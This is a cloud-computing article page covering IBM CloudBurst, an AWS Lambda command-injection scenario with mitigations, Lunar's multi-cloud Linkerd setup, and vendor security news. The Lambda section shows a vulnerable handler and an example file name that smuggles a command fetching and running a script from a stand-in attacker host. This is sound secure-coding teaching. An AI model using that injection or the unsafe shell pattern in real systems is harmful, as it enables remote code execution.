IBM's CloudBurst: A Credible Step Forward in the Cloud Computing Arena

Abhinav Anand | June 9, 2022

IBM's CloudBurst
IBM CloudBurst is a ready-to-use, self-contained service delivery platform that can be deployed quickly and efficiently in a data center. It enables the data center to create service platforms for a wide range of workload types with a high degree of integration, flexibility, and resource optimization, resulting in a better request-driven user experience while also reducing costs and expediting time to market. In addition, IBM CloudBurst includes the IBM Global Technology Services (GTS) installation service, making it a comprehensive bundle of hardware, software, and services that can be up and running in your environment right away.

To quickly integrate cloud computing, IBM CloudBurst combines the necessary hardware, software, and service components. As a single solution, IBM CloudBurst simplifies the complexities of establishing a cloud computing architecture, allowing businesses to quickly grasp the benefits and financial potential of a dynamic infrastructure. By demystifying the cloud computing model, CloudBurst helps enterprises discover the benefits and business possibilities of a dynamic infrastructure more rapidly. As a cloud computing quick start, IBM CloudBurst lets businesses demonstrate the benefits of the delivery model in a specific area of their data center or for a single internal project.


Building a Dynamic Infrastructure With IBM CloudBurst

IBM's Service Delivery Manager solution for x86 and Power systems is based on a pre-integrated, software-only stack. It is installed as a set of virtual images that automate the deployment of IT services and enable resource monitoring, cost management, and service provisioning in the cloud.

Similarly, by adding cloud bursting to your LSF cluster, you can choose how much capacity to use based on your company's needs. When time is money, the cloud is ready; when demand is low, the meter stops and the cloud waits.


Handling Compute-Heavy Workloads With Resource Planning

It is challenging to strike a delicate balance between the expense of computing resources and the cost of delayed decisions. With the introduction of cloud bursting, however, a new level of flexibility is available to break the impasse. When space in your data center is limited, you can extend your existing IBM Spectrum LSF cluster to IBM Cloud, where you can access almost unlimited resources and pay only for what you use.

“Automating IT resources to support new applications is critical because at most companies, a business user typically must wait weeks to get access to new IT resources due to the manual processes required to set up resources,” said Lauren States, vice president of Tivoli Cloud Computing for IBM.

This automation not only simplifies the initial creation of a proof-of-concept cluster but also provides the basic toolset for the rapid provisioning and takedown of resources that define cloud bursting.
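
To illustrate that provisioning-and-takedown loop in concrete terms, here is a minimal, hypothetical Python sketch of a cloud-bursting controller. It is not IBM's or LSF's actual API; the threshold, the simulated scheduler query, and the provision/release helpers are stand-ins for whatever scheduler commands and cloud calls your environment actually uses.

```python
import random
import time

# Hypothetical policy values; tune them to your own cost/urgency trade-off.
PENDING_JOBS_PER_HOST = 10      # burst out when the backlog exceeds this many jobs per host
POLL_SECONDS = 60               # how often a real controller would re-evaluate demand

cloud_hosts = []                # burst hosts this controller is currently paying for

def get_pending_jobs():
    """Stand-in for querying the scheduler (e.g. LSF) for the number of queued jobs."""
    return random.randint(0, 100)   # simulated backlog

def provision_cloud_hosts(count):
    """Stand-in for asking the cloud provider for extra worker nodes."""
    for _ in range(count):
        cloud_hosts.append(f"burst-host-{len(cloud_hosts)}")
    print(f"provisioned {count} host(s); running {len(cloud_hosts)} burst host(s)")

def release_cloud_hosts(count):
    """Stand-in for returning idle burst hosts so the meter stops."""
    for _ in range(count):
        print(f"released {cloud_hosts.pop()}")

def reconcile():
    pending = get_pending_jobs()
    wanted = pending // PENDING_JOBS_PER_HOST
    if wanted > len(cloud_hosts):
        provision_cloud_hosts(wanted - len(cloud_hosts))   # demand is high: burst out
    elif wanted < len(cloud_hosts):
        release_cloud_hosts(len(cloud_hosts) - wanted)     # demand dropped: scale back in

if __name__ == "__main__":
    for _ in range(5):              # a few control-loop iterations, for illustration
        reconcile()
        time.sleep(1)               # use POLL_SECONDS in a real controller
```

The point of the pattern is the reconcile step: capacity follows the backlog, so the meter runs only while there is work worth paying for.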


Conclusion

One of the numerous advantages of the cloud is that you are never tied to a specific piece of hardware. If you choose a storage cluster and later require more capacity or performance, you can always rebuild it with more resources.

Today's businesses can pick from a variety of storage technologies. That is why it is critical to comprehend the many alternatives, their usefulness, and the appropriate use cases for the various storage mechanisms. To meet today's modern business needs, IBM offers a variety of storage options.

Spotlight

The Via Group, Inc.

The Via Group is recognized by some of the world’s largest corporations as the partner to deliver Unified Communications and Voice (TDM/VoIP) solutions. With roots in voice and messaging products since 1990, Via engineers bridge the gap between telephony and computing to deliver real-time messaging, unified messaging, voice, and conferencing to the desktop environment.

OTHER ARTICLES
CLOUD APP DEVELOPMENT

Vulnerable AWS Lambda Function – Initial Access in Cloud Attacks

Article | February 18, 2022

Our security research team prepared a real attack scenario to explain, from the black box and white box perspectives, how a vulnerable AWS Lambda function could be used by attackers as initial access into your cloud environment. Finally, we show the best practices to mitigate this attack vector.

Serverless is becoming mainstream in business applications as a way to achieve scalability, performance, and cost efficiency without managing the underlying infrastructure. These workloads are able to scale to thousands of concurrent requests per second. One of the most widely used serverless services in cloud environments is AWS Lambda. One essential element of raising an application to production is security. An error in code or a lack of user input validation may allow the function to be compromised and could let attackers gain access to your cloud account.

About AWS Lambda

AWS Lambda is an event-driven, serverless compute service that permits the execution of code written in different programming languages and automates actions inside a cloud environment. One of the main benefits of this approach is that Lambda runs our code on a highly available compute infrastructure managed directly by AWS. The cloud provider takes care of all the administrative activities related to the underlying infrastructure, including server and operating system maintenance, automatic scaling, patching, and logging. The user can simply implement their code, and the function is ready to go.

Security, a shared pain

From a security perspective, because the service is managed by the cloud provider but still configured by the user, the security concerns and risks are shared between the two actors. Since the user has no control over the infrastructure behind a specific Lambda function, the security risks of the underlying infrastructure are managed directly by the cloud provider. Using AWS IAM, the user can restrict the access and the permitted actions of the Lambda function and its components. Misconfigured permissions on IAM roles or objects used by the Lambda function might cause serious damage, leading attackers inside the cloud environment. Even more importantly, the code implemented in the Lambda function is under user control and, as we will see in the next sections, if there are security holes in the code, the function might be used to access the cloud account and move laterally.

Attack scenarios

We walk through two attack scenarios using two different testing approaches: black box and white box testing, the two main approaches used in penetration testing to assess the security posture of a specific infrastructure, application, or function. Looking at the Lambda function from different perspectives helps create a better overall picture of its security posture and helps us better understand the possible attacks and the related risks.

Black box vs. white box

In black box testing, whoever is attacking the environment has no information about the environment itself or the internal workings of the software system. In this approach, the attacker needs to make assumptions about what might be behind the logic of a specific feature and keep testing those assumptions to find a way in. For our scenario, the attacker has no access to the cloud environment and no internal information about the cloud environment or the functions and roles available in the account.

In white box testing, the attacker already has internal information which can be used during the attack to achieve their goals. In this case, the attacker has all the information needed to find the possible vulnerabilities and security issues. For this reason, white box testing is considered the most exhaustive way of testing. In our scenario, the attacker has read-only initial access to the cloud environment and can use this access to assess what is already deployed and better target the attack.

In this attack scenario, the attacker found a misconfigured S3 bucket, open to the public, containing different files owned by the company. The attacker is able to upload files into the bucket and check each file's configuration once uploaded. A Lambda function is used to calculate the tags for each file uploaded, although the attacker doesn't know anything about the code implemented in the Lambda. We can be pretty confident there is an AWS Lambda function behind those values. The function appears to be triggered when a new object is created in the bucket. The two tags, Path and Size, seem to be calculated dynamically for each file, perhaps by executing OS commands to retrieve the information. We can assume the file name is used to look up the file inside the OS and also to calculate the file size. In other words, the file name might be a user input that is used in an OS command to retrieve the information to put in the tags. Missing user input validation might let an attacker submit unwanted input or execute arbitrary commands on the machine. In this case, we can try to inject other commands into the file name to achieve remote code execution. Concatenating commands using a semicolon is a common way to append arbitrary commands to the user input so that the code executes them if the input isn't well sanitized.
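
To make the injection risk concrete, here is a small, hypothetical Python sketch of a tagging Lambda of the kind described above. It is not the code from the scenario, which the attacker never sees; the handler names, the use of `stat`, and the `/tmp/` path are illustrative assumptions, and only the S3 event structure is standard.

```python
import os
import subprocess

def vulnerable_handler(event, context):
    """Risky pattern: the S3 object key (user-controlled input) is pasted into a shell command."""
    key = event["Records"][0]["s3"]["object"]["key"]
    # A key such as "file.txt; curl http://attacker.example/x | sh" appends a second command.
    size = os.popen(f"stat --format=%s /tmp/{key}").read().strip()
    return {"Path": f"/tmp/{key}", "Size": size}

def safer_handler(event, context):
    """Same job without a shell: the key is passed as a single argument, so a semicolon
    in the file name stays part of the file name instead of starting a new command."""
    key = event["Records"][0]["s3"]["object"]["key"]
    result = subprocess.run(
        ["stat", "--format=%s", f"/tmp/{key}"],
        capture_output=True, text=True, check=False,
    )
    return {"Path": f"/tmp/{key}", "Size": result.stdout.strip()}
```

Avoiding the shell entirely, as in the second handler, is usually simpler and safer than trying to blocklist characters such as semicolons.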

Mitigation

We have seen the attack scenario from the black box and white box perspectives, but what can we do to mitigate it? In the proposed scenario we covered different AWS components, like S3 buckets and AWS Lambda, in which some security aspects have been neglected. To mitigate this scenario successfully, we can act on different levels and different features. In particular, we could:

Disable public access for the S3 bucket, so that it is accessible only internally and to users who are authenticated in the cloud account.
Check the code used inside the Lambda function, to be sure there are no security bugs and all user inputs are correctly sanitized, following the guidelines for writing secure code.
Apply the least-privilege principle to all the AWS IAM roles attached to cloud resources, to avoid unwanted actions or possible privilege escalation paths inside the account.

Let's look at each of these points in detail and at how we can enforce the mitigations.

Disable public access for the S3 bucket

An S3 bucket is one of the key storage components in AWS. S3 buckets are often targeted by attackers who want to break into cloud accounts, so it is critical to keep them as secure as possible, applying all the security settings available and preventing unwanted access to our data or files. In this specific scenario, the bucket was publicly open, and unauthorized users were able to read and write objects in it. To avoid this behavior, we need to make sure the bucket is reachable only privately, applying security settings that restrict access; one way to apply those settings programmatically is sketched below.
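
The snippet below is a minimal boto3 sketch that enables S3 Block Public Access on the bucket. The bucket name is a placeholder, and the same setting can equally be applied from the console, the AWS CLI, or infrastructure-as-code.

```python
import boto3

s3 = boto3.client("s3")

# Placeholder bucket name; substitute the bucket from your own environment.
BUCKET = "example-upload-bucket"

# Turn on all four Block Public Access settings so ACLs and bucket policies
# can no longer expose the bucket's objects to unauthenticated users.
s3.put_public_access_block(
    Bucket=BUCKET,
    PublicAccessBlockConfiguration={
        "BlockPublicAcls": True,
        "IgnorePublicAcls": True,
        "BlockPublicPolicy": True,
        "RestrictPublicBuckets": True,
    },
)

# Confirm the configuration that is now in effect.
print(s3.get_public_access_block(Bucket=BUCKET)["PublicAccessBlockConfiguration"])
```

With all four flags set, public ACLs and public bucket policies are blocked or ignored, which closes the anonymous upload path the attacker relied on in this scenario.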

CLOUD APP DEVELOPMENT

Breaking the multi-cloud barrier in a regulated industry

Article | July 18, 2022

How Kubernetes and Linkerd became Lunar's multi-cloud communication backbone

At Lunar, a Scandinavian online bank, we embraced cloud native tech early on. We've been running Kubernetes since 2017 and today have over 250 microservices distributed across three clouds. This blog will explore how we set out to centralize all platform services. The gains were substantial — from being better prepared to absorb newly acquired companies to improved developer productivity.

About Lunar

Founded in 2015, Lunar set out to challenge the banking status quo by reinventing how people interact with their finances. Lunar is for those who want everything money-related in one place — 100% digital, right in their hands. For us, that meant offering customers a smarter way to manage their money with more control, faster savings, easier investments, and no meaningless fees. That's how we envision the future of banking. In 2021, Lunar acquired Lendify, a Swedish lending company, and PayLike, a Danish fintech startup. This is all part of Lunar's broader strategy to grow and scale. It also meant we had to integrate all these systems so they work together smoothly.

Lunar's commitment to cloud native principles

Lunar's team of 150+ full-time engineers push about 40 releases to production on any given day. Out of these 150, ten are platform engineers, and that's the team that I lead. We operate nine Kubernetes clusters across three cloud providers (AWS, Microsoft Azure, and Google Cloud Platform) in multiple availability zones. We also run 250+ microservices plus a range of platform services that are part of our self-service developer platform. We want our teams — or Squads, as we call them — to be autonomous and self-driven. To support this "shift left" mindset, a group of platform Squads builds abstractions and tooling to ensure developers can move their features fast, securely, compliantly, and efficiently. The Lendify acquisition means we now have an Azure-based platform we have to integrate and adapt so it complies with the same cloud native principles Lunar is built on. We are currently working on seamlessly connecting our AWS and Azure environments.

There are multiple reasons why we chose the cloud native path. First, we needed a platform that allowed our teams to manage their services and be fully autonomous. Secondly, as a fintech company pioneering cloud-based banking, we had to provide a clear exit strategy for cloud providers — a regulatory requirement from the Danish FSA. Kubernetes was a perfect fit. Functioning as an abstraction on top of a cloud provider, it helped us achieve both goals. This autonomy allowed us to scale easily as most dependencies were removed. Squads are also supported by a mix of open source tooling, including Backstage, Prometheus, and Jaeger, and some custom-built solutions, which we have open-sourced, such as shuttle and release-manager. This multi-cloud strategy and work style support the company's goal of scaling, both in terms of the number of employees and mergers and acquisitions. It also allows us to stay technology agnostic and choose the technologies that best fit our needs.

Oh no, where are our production logs?

The idea of centralizing platform services started with our log management system, Humio. At the time, we were developing failover processes for our production Kubernetes clusters. As it turned out, this led to missing logs in our log management system. That's when we realized we had to remove the system from our production cluster and centralize it before performing any failover in production.

From logs to centralizing all platform services

After successfully centralizing our log management system, we decided to embark on a platform services centralization journey prior to any corporate acquisitions. While we had multiple environments, many of our platform services, such as our observability stack, were replicated in each environment. These services require a vast amount of resources and are fairly complex. Services such as Humio, Prometheus, and Jaeger (with Elasticsearch) are stateful services, and having stateful services in "workload" clusters makes failover and disaster recovery much harder. For this reason, we decided to minimize the number of stateful services in these environments. Additionally, running nine replicated setups simply didn't scale — we needed a centralized solution. Moreover, having multiple endpoints for accessing things like Grafana led to lots of duplication of users, dashboards, etc. This caused confusion for our developers; changes had to be made in multiple places, leading to drift between environments and other challenges. Managing users in one system was a lot more efficient than doing so in nine (or more). That's why we decided to create a centralized cluster owned by the platform team that would eventually run the entire observability stack, release management, developer tooling, and cluster-API. Today, our log and release management runs as centralized services the platform team provides. Backstage is also provided out of the centralized environment, along with a handful of other tools. Next in line is our monitoring setup, a mix of Buoyant Cloud and Prometheus/Grafana.

The quest to connect our clusters

Once we started centralizing platform services, we needed to connect our clusters. At the time, we were only running clusters in AWS and considered VPC peering across our accounts. Doing that was somewhat painful due to clashing CIDR ranges. We also evaluated VPNs but aren't big fans of using technologies with two static boxes on each end. Besides, we wanted to move towards zero trust networking, following the principles of BeyondProd by Google.

Service meshes finally caught up with our needs

We continuously evaluated service meshes during our 5+ years of running Kubernetes in production. In 2017, we had Linkerd running as a PoC but decided against it. It was still the JVM-based Linkerd 1 and quite complex. We kept following the development and evolution of service meshes and, when we saw the Linkerd 2.8 release and its multi-cluster capabilities, we realized it was time to give service meshes another shot. Our decision was further reinforced by some problems we were experiencing with gRPC load balancing (which is not natively supported by Kubernetes) and the need to switch to mTLS for all internal communication. A service mesh made a lot more sense now. While we evaluated both Linkerd and Istio, we have always been big fans of the approach Linkerd took: start with the basics and make that work well. We gave ourselves a week: two engineers, one playing with Istio and the other with Linkerd. We had the Linkerd multi-cluster setup up and running within an hour! After a few days of struggling with Istio, we gave up on it. Linkerd did the job fast and easily — the perfect mesh for us. It had all the features we needed at the time, was easy to operate, had a great community, and had solid documentation. Since going live, we have also started using Buoyant Cloud for better visibility across all our environments.

Lunar is committed to the CNCF stack

At Lunar, we are big fans of CNCF projects and use many of them (in fact, I'm a CNCF Ambassador and love educating the community on these awesome projects!). Lunar is also a CNCF End User Member. Our stack includes Kubernetes, Prometheus, cert-manager, Jaeger, CoreDNS, Fluent Bit, Flux, Open Policy Agent, Backstage, gRPC, and Envoy, among others. We've built an Envoy-based ingress/egress gateway in all clusters to provide a nice abstraction for developers to expose services in different clouds.

Prepared to scale our business and shake up the European banking market

From a technology perspective, we have now achieved a fairly simple way to provide and connect clusters across clouds. Kubernetes allows us to run anywhere, Linkerd enables us to seamlessly connect our clusters, and GitOps provides an audited way to manage our environments across multiple clouds with the same tooling and process. And from a developer perspective, whether you deploy on GCP or AWS, the process is identical.

Seamless integration with newly acquired startups

The business impact has been substantial. With our new multi-cloud communication backbone, we are better positioned to support upcoming mergers and acquisitions — a key part of our business strategy. Having a cloud-agnostic way to extend the Lunar platform to acquired systems, regardless of where they run, is incredibly powerful. It also allows us to select the provider that best fits our needs for each use case.

Fully prepared for DR while compliant with government regulations

The fact that we are no longer losing logs during failover is huge. We'll soon implement quarterly failovers for our production clusters. We need to ensure we know exactly how our system behaves in case of a failure and how to bring it back up. It's important from both a regulatory perspective and a business perspective. If our customers were to lose access to their account information, it would have disastrous consequences for our business. That's why we proactively train for the worst-case scenario. If something were to happen, we would know exactly what to do and how to avert an issue. We are big believers in the pets vs. cattle idea but go a step further: we don't want pet servers or pet clusters either. Imagine losing logs each time we perform a failover. Without audit logs, we'd fall out of regulatory compliance right there and then.

Centralized services and streamlined processes increased developer productivity

Centralizing most of our platform services has already streamlined many processes and improved developer productivity. We ensure that all releases, metrics, logs, traces, etc., are properly tagged with fields such as Squad names, environments, and so on, making it easy for developers to find what they are looking for. It also ensures clear ownership of each piece. Managing the team is also a lot simpler. For me, that means I don't have to set up dashboards, help search through logs, etc. — our Squads are truly independent. Because our platform is based on self-service, it is decoupled from the organization, allowing our team to focus on implementing the next thing that will help our developers move faster, be more secure, or ensure better quality.

Easy audits and peace of mind for management

Then there are the easy audits. Since everything is centralized, we can run audit reports for all clouds and services across groups and environments. That is good for us and provides peace of mind in the highly regulated financial services industry. While we aren't there yet, we expect to save significant engineering time by not having to operate and maintain nine versions of the soon-to-be fully centralized stack.

Well-positioned to scale fast and smoothly

Overall, we feel well-positioned for upcoming acquisitions and organic growth. With a platform able to extend anywhere, we've become a truly elastic organization.

CLOUD APP DEVELOPMENT

Elastic releases security solution for the cloud

Article | May 20, 2022

Elastic announced the launch of Elastic Security for Cloud, extending the capabilities of the existing Elastic Security offering, which included SIEM and endpoint protection, to incorporate cloud risk and posture management and cloud workload protection. The new solution allows enterprises to manage their security posture for cloud-native and hybrid environments with infrastructure detection and response (IDR) and a machine learning offering that can detect known and unknown threats in cloud environments. This approach means that enterprises can detect and respond to malicious activity in the cloud as soon as possible to minimize the risk and damage caused by intrusions.

Addressing cloud complexity

The release comes as modern enterprises struggle to secure cloud environments. Research shows that not only are 76% of organizations using two or more cloud providers, but also that 35% of organizations have more than 50% of their workloads in the cloud. This means that, for many organizations, protecting the cloud attack surface is now vital to maintaining operational stability. In other words, the complexity of cloud deployments has created a need for solutions with cloud detection and response capabilities, so that enterprises can respond to threat actors who are targeting this new attack surface.

"The world has rapidly transitioned to the cloud and chosen operations over security. Cloud infrastructure is stood up and torn down at a blazing rate and many different teams are deploying these cloud instances. Just answering the question, 'Am I good?' is an increasingly complex question to answer for CIO/CISOs," said Mike Nichols, vice president of product for Elastic Security.

Elastic's answer to monitoring these environments is a cloud posture management and IDR solution that can improve security teams' visibility into external threats.

The cloud security market

Elastic Security is competing in the global cloud security market, which researchers valued at $40.8 billion in 2021 and anticipate will grow to $77.5 billion by 2026 as enterprises attempt to keep up with the increasing sophistication of cyberattacks and the rise in bring your own device (BYOD) and choose your own device (CYOD) policies. In the realm of cloud security, one of Elastic's main competitors is Splunk, a cloud and observability monitoring platform that can monitor public clouds, apps, services, on-premise data centers, and edge services. Last year, Splunk announced it had received a $1 billion investment from Silver Lake. Another competitor in the market is Wazuh, an XDR and SIEM tool designed for protecting endpoints and cloud workloads with vulnerability detection, log data analysis, workload protection, and container security. Wazuh currently has more than 10 million downloads per year and is used by a range of companies including Verifone, Walgreens, Rappi, Grubhub, Intuit, and more. One of Elastic Security's key differentiators, however, is that the solution is built on the Elastic Search Platform, with analytics, SIEM, endpoint protection, XDR, and cloud security all offered as part of a single offering.

CLOUD APP DEVELOPMENT

Database Management in the Cloud Computing Era

Article | May 20, 2022

A cloud computing database is ideally a service that is built, deployed, and delivered via a cloud platform. A cloud platform as a service (PaaS) delivery model allows organizations, end users, and applications to store, manage, and retrieve data using the cloud. Seen from a structural and design perspective, a cloud database is not very different from one that runs on an organization's own on-premise servers. However, ever since big data entered the space, database management has become a little more complex. In addition to traditional, structured data, we also have semi-structured and unstructured data coming in from almost all directions.

In recent times, there has been significant adoption of cloud platforms, infrastructures, and services, and the blend of cloud technology with database services has created more demand on the management side. Cloud databases, which are also widely termed Database-as-a-Service (DaaS), offer various added options for organizations to choose from. With the current rate of adoption, experts strongly expect that DaaS will, just like any other "as-a-service," become the standard solution for all highly sensitive and mission-critical data.

How Can Cloud Database Management Help Your Business?

Every organization has a constant need to manage its data in the most efficient way possible. A cloud database effectively fulfills an organization's needs with respect to data, from keeping information secure, accurate, and consistent to ensuring resource utilization and optimal performance. Cloud data management is constantly changing the way organizations think about data. The cloud helps bring in the versatility, security, and professional data management assistance that is required. For any business to survive and succeed, it should ensure that its data is healthy so that everyone in the organization has access to the data they need, when they need it.

"Line-of-business leaders everywhere are bypassing IT departments to get applications from the cloud (also known as software as a service, or SaaS) and pay for them similar to a magazine subscription. And when the service is no longer required, they can cancel that subscription with no equipment left unused in the corner." - Daryl Plummer, Gartner analyst

Effective Strategies for Database Management in Cloud Computing

Using a cloud-based database makes it easy for your database to grow along with your needs and requirements, in addition to scaling up or down on demand to accommodate peak-workload phases. Ideally, before procuring a cloud data management system, it is essential to have a solid strategy that suits your organization's ecosystem and, at the same time, helps you get the most out of the system you select.

Exploring the Best Practices for DBM in Cloud Computing

There are various methods organizations can use to effectively develop, monitor, and manage database infrastructure. These days, organizations can also choose between a ready-made database management system and a solution tailored to their requirements. Keeping all these aspects in mind, it is also essential that organizations follow established best practices to ensure optimum results. Some of the best practices for database management in cloud computing are mentioned below:

Before moving to the cloud, build a robust data management architecture.
Give cloud data integration requirements first priority.
Govern data comprehensively, regardless of its platform or location.
Use encryption and VPNs to protect data in transit (a minimal connection sketch follows this list).
Automate database management tasks to keep track of them.
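
As an illustration of the in-transit encryption practice above, the fragment below opens a TLS-verified connection to a managed PostgreSQL instance using psycopg2. The host name, database, credentials, and certificate path are placeholders, and PostgreSQL is just one example; most cloud database drivers expose equivalent options.

```python
import psycopg2

# Hypothetical connection details for a managed PostgreSQL instance; substitute your own.
conn = psycopg2.connect(
    host="mydb.example-cloud-provider.com",
    port=5432,
    dbname="appdb",
    user="app_user",
    password="use-a-secret-manager-not-a-literal",
    sslmode="verify-full",                      # require TLS and verify the server certificate
    sslrootcert="/etc/ssl/certs/cloud-db-ca.pem",
)

with conn, conn.cursor() as cur:
    cur.execute("SELECT version()")             # trivial round-trip to confirm the session works
    print(cur.fetchone()[0])

conn.close()
```

Using sslmode="verify-full" rather than just "require" also checks that the server certificate matches the host, which protects against interception as well as passive eavesdropping.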

Why Is Cloud DBMS the C-Suite's Pick?

While it is more than evident that data management is one of the most crucial components of any organization today, it is also a clear area of value addition for an organization's top executives. Every industry relies heavily on data and its management, and with the ongoing shift towards cloud services, many organizations and their C-suites are now evaluating what cloud services bring to the table, especially on the data front. Once the core pain points are assessed and the C-suite sees how a cloud database management system would help the organization become more efficient, there is no other obvious choice.

Microsoft Consulting Services, along with Tata Consultancy Services (TCS), partnered with Walgreens to create the Information, Data, and Insights (IDI) platform powered by Azure. When patients or medical providers initiate the prescription fulfilment process, Azure Databricks and Azure Synapse Analytics move hundreds of related data points through the IDI. Pharmacists can access information through a centralized dashboard interface and request data visualizations. Pharmacists gain real-time insights, and the system can scale as needed to meet current demand. During peak times, the platform can handle more than 40,000 transactions per second. Compared to Walgreens' previous solution, the private cloud-based architecture saves an enormous amount of time on every transaction: prescription data that once took about 48 hours to reach its data warehouse can now be handled by Walgreens within minutes.

Conclusion

With the next big things being data and the cloud, how can an amalgamation of both be wrong? That said, everyone will have their own share of concerns and questions. But with what is being built and the capabilities being worked on, this space is bound to bring in numerous opportunities. So, as the world slowly makes this shift, it's time you reconsidered, if you haven't already, before you get overwhelmed at the helm of data!

FAQ

What Are the Best Features Available in Cloud Database Management?
While there are numerous features that one can leverage using cloud database management, the top five are listed below:
Elasticity
Scalability
High availability
Easy data reduction
Redundancy

Which Is the Most Popular Cloud Database?
One of the most popular and widely used cloud databases is the Microsoft Azure cloud database. It provides services in computing, networking, databases, analytics, artificial intelligence, and the Internet of Things.

In Cloud Computing, What Is Database Management?
Cloud data management is a technique for managing data across cloud platforms, either in combination with or instead of on-premises storage. Disaster recovery, backup, and long-term archiving can benefit from using the cloud as a data storage tier. In addition, resources can be acquired as needed using cloud data management.

Related News

CLOUD APP DEVELOPMENT

BCS Joins Google Cloud Partner Advantage

BCS | August 03, 2022

BCS Data Center Operations (BCS), one of North America's leading critical infrastructure facility management providers, has joined the Google Cloud Partner Advantage program as a Google Cloud partner. The designation expands BCS Cloud Services while reinforcing the company's single-source, self-performance operations model. As a Google Cloud partner, and as part of the BCS Cloud Services solution, BCS customers can speed cloud migration and adoption while decreasing overall Google Cloud expenditures. BCS Cloud Services features a free cloud architecture consultation, frameworks to facilitate change management, and utilization of rules-based industry best practices.

"BCS Cloud Services is yet another example of BCS's industry-leading self-performance model. BCS Cloud Services and the Google Cloud partner designation provide customers peace of mind by freeing their IT teams to focus on their core activities, while we help enable their organization's cloud journey," said BCS Chief Government Programs Officer Craig Harris.

BCS Cloud Services expands BCS's growing Government Programs solution set while enhancing the BCS self-performance operations model. Under this model, BCS employees perform a minimum of 80% of all services, decreasing operating costs by more than 20%. This practice contrasts with the less efficient and more costly common industry practice of contracting with multiple vendors and subcontractors. Last year, BCS expanded its solutions portfolio to include a BCS Government Programs division dedicated to supporting federal, state, and local government entities. Earlier this year, BCS was awarded Texas Department of Transportation contracts to perform critical infrastructure HVAC, maintenance, and installation services for multiple Texas districts.

About BCS

BCS is an enterprise-level, critical facilities operations company focusing exclusively on data centers. The BCS solutions portfolio includes facility management, IT services, physical security, and a range of value-added professional services through one fully integrated self-performance model. BCS utilizes advanced technology and centralized services, including BCS CriticalWorks, BCS CriticalCare, the BCS Tactical Operations Center, and BCS Government Programs, to achieve increased performance, efficiency, and scale. BCS serves the needs of Fortune 500 companies with more than 7.5 million total square feet and more than 450 MW of data center critical power under contract.


CLOUD SECURITY

Micro Focus' CyberRes Partners with Google Cloud to Enable High-Scale Secure Cloud Analytics with Data Privacy

Micro Focus | August 09, 2022

CyberRes, a Micro Focus line of business, today announced a partnership with Google Cloud to support the upcoming release of BigQuery remote functions. The partnership will see CyberRes' end-to-end enterprise data protection solution, Voltage SecureData, integrate with Google's BigQuery data warehouse to accelerate and expand organizations' data science initiatives and help companies comply with ever-evolving privacy regulations. The integration will enable CyberRes Voltage customers to persistently protect data in use, in motion, and at rest in Google BigQuery. The support for remote functions also enables Google Cloud's BigQuery customers to take advantage of Voltage's privacy-enabling technologies. Mutual customers can use Voltage's format-preserving encryption, hashing, and tokenization services within BigQuery in conjunction with Google BigQuery's native security to address strict privacy compliance controls. Voltage's cloud-agnostic and consistent data protection allows all customers to safely use regulated data for analytics across hybrid clouds.

"The availability of remote functions from BigQuery is an exciting and critical evolution of Google Cloud's platform for our customers," said Tony de la Lama, Vice President of Product Management, CyberRes. "The integration with Voltage SecureData means BigQuery will allow customers to utilize and support the Voltage data-centric protection approach for secure analytics, enabling enterprises to accelerate and expand their data science initiatives with privacy by default."

BigQuery, Google Cloud's highly scalable multi-cloud data warehouse, is designed for business agility and allows customers to gain insights with real-time and predictive analytics and to access data and securely share insights with ease. This new partnership adds to Voltage SecureData's deep capabilities in securing analytics across data warehouses, databases, and data lakes and enables customers to shift workloads seamlessly and securely to BigQuery.

"Emerging threats and evolving technology needs are at the forefront of challenges in cyber security. By making its Voltage SecureData solution available to Google Cloud customers from within their BigQuery data warehouse, CyberRes is enabling customers with the technologies needed to protect their sensitive data while addressing and adhering to current data privacy regulations," said Ritika Suri, Director, Technology Partnerships, Google Cloud.

The CyberRes Voltage portfolio helps secure organizations with continuous data discovery, insight, and protection to reduce risk and enable privacy by design. Organizations can work with high-value, sensitive customer data in its protected state to derive business intelligence without the risk of data exposure in Google BigQuery. The data protection technologies in Voltage SecureData provide flexible implementation and data-centric protection for a virtually unlimited number of structured data types in any language, and in any region, with proven performance, reliability, and scalability.

About CyberRes

CyberRes is a Micro Focus line of business. We bring the expertise of one of the world's largest security portfolios to help our customers navigate the changing threat landscape by building both cyber and business resiliency within their teams and organizations. CyberRes is part of a larger set of digital transformation solutions that fight adverse conditions so businesses can continue to run today, keep the lights on, and transform to grow and take advantage of tomorrow's opportunities.


CLOUD APP DEVELOPMENT

Snyk Unveils Snyk Cloud, the Industry's First Developer-Centric Cloud Security Solution

Snyk | July 27, 2022

Snyk, the leader in developer security, today unveiled Snyk Cloud, announcing the launch of the industry's first comprehensive cloud security solution designed by and for developers. This latest development was made possible by the acquisition of Fugue earlier this year. Thoughtfully designed with global DevSecOps teams in mind, Snyk's cloud security solution unites and extends the existing products Snyk Infrastructure as Code and Snyk Container with Fugue's leading cloud security posture management (CSPM) capabilities. These elements are now combined into a fully featured cloud security solution that allows today's modern developers to continue their rapid pace of innovation securely.

The Snyk Cloud product extends the company's existing Developer Security Platform in a significant way, allowing more companies to embrace DevSecOps and spark further effective collaboration between their developer, operations, security, and compliance teams. Instead of grappling to patch together multiple, incompatible cloud and application security solutions, ultimately leading to a fragmented view of application security in the cloud, global developers now have the ability to take full ownership of their infrastructure. At the same time, their security counterparts can define and operate a consistent cloud security posture across the entire software development lifecycle (SDLC). With the digital era's ever-rising need for innovation speed, siloed application and cloud security tools that focus on detecting issues after deployment are too slow and risky, creating growing tension between developer and security teams.

With the addition of Snyk Cloud, Snyk customers will now be the first to benefit from a unified platform and policy engine that equips them to create secure deployments via an unmatched feedback loop — from code to cloud and back to code — securing their cloud before deployment, maintaining its secure integrity while running, and then assessing and prioritizing the precise places to provide fixes back in the code. In fact, over the past year, Snyk customers have reported that they improve their security risk posture by more than 60% by reducing the time it takes to find and fix vulnerabilities.

"Snyk's developer-first approach disrupted the application security industry and we're now aiming to apply many of those lessons learned to the fastest growing segment of cybersecurity today: cloud security. Predicted to be worth $77.5 billion by 2026, this is an area ripe for change. Today's news represents another important milestone for the developer security movement, and we look forward to the industry's response to our vision of uniting AppSec and CloudSec teams to secure today's apps more efficiently," said Peter McKay, CEO, Snyk.

"Our global customers have witnessed firsthand how previous cybersecurity tenets have evolved profoundly, with cloud infrastructure now changing just as fast as the apps themselves. They're eager for one comprehensive solution that provides a truly complete cloud picture, driving DevSecOps by enhancing developer productivity securely," said Adi Sharabani, CTO, Snyk. "We're incredibly proud to reveal this industry gamechanger, Snyk Cloud, the first developer security product designed for the cloud era to address every important stage of a modern app's life today, from development through to production."

Now Powered by Snyk: The Cloud Security Podcast

